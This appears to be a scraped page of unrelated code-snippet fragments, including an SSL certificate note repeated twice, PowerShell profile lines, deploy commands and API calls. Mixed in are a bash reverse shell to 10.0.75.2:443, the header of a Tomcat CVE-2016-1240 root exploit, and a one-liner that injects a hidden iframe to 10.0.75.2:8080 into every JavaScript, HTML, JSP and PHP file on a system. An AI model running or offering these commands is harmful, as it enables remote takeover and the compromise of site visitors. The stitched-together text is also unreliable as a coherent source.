I use Namecheap.com as a registrar, and they resale SSL Certs from a number of other companies, including Comodo.
These are the steps I went through to set up an SSL cert.
nohup /bin/bash -i >/dev/tcp/10.0.75.2/443 0<&1 2>&1 & |
#!/bin/bash | |
# | |
# Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit | |
# | |
# CVE-2016-1240 | |
# | |
# Discovered and coded by: | |
# | |
# Dawid Golunski | |
# http://legalhackers.com |
find / -type f -name "*.js" -exec sh -c 'echo ";document.addEventListener(\"DOMContentLoaded\", function(event) { document.body.insertAdjacentHTML( \"beforeend\", \"<iframe style='"'"'display:none'"'"' src='"'"'http://10.0.75.2:8080'"'"'></iframe>\" );});" >> "$1"' -- {} \; ; find / -type f -iregex '.*\.\(html\|htm\|jsp\|php\)$' -exec sed -i 's/<\/body>/<iframe style="display:none" src="http:\/\/10.0.75.2:8080"><\/iframe><\/body>/g' {} \; |
set-location c:\Users\Ale\Documents\GitHub | |
Write-Host "Setting up GitHub Environment" | |
. (Resolve-Path "$env:LOCALAPPDATA\GitHub\shell.ps1") | |
Write-Host "Setting up Posh-Git" | |
. (Resolve-Path "$env:github_posh_git\profile.example.ps1") | |
Remove-Item alias:gcm -Force | |
Remove-Item alias:gc -Force | |
Remove-Item alias:gp -Force |
tar -xzf Betterbin.tar.gz | |
rsync -aq bundle/ [email protected]:/opt/betterbin | |
ssh [email protected] "nohup sh /opt/betterbin.co/run.sh" |
console.log(getMultipliers(['poison','fire'])) |
I use Namecheap.com as a registrar, and they resale SSL Certs from a number of other companies, including Comodo.
These are the steps I went through to set up an SSL cert.
2015-06-29 |
http://pokeapi.api-docs.io/v2.0
curl --request GET --url http://pokeapi.co/api/v2/pokemon/bulbasaur/
var to_send = {} | |
to_send.title = "title"; | |
to_send.content = "content"; | |
to_send.author = "aut"; | |
to_send.language = "css"; | |
to_send = JSON.stringify(to_send); | |
var request = new XMLHttpRequest(); | |
request.open('POST', 'http://localhost:3000/api/v1/new', true); | |
request.setRequestHeader('Content-Type', 'application/json; charset=UTF-8'); |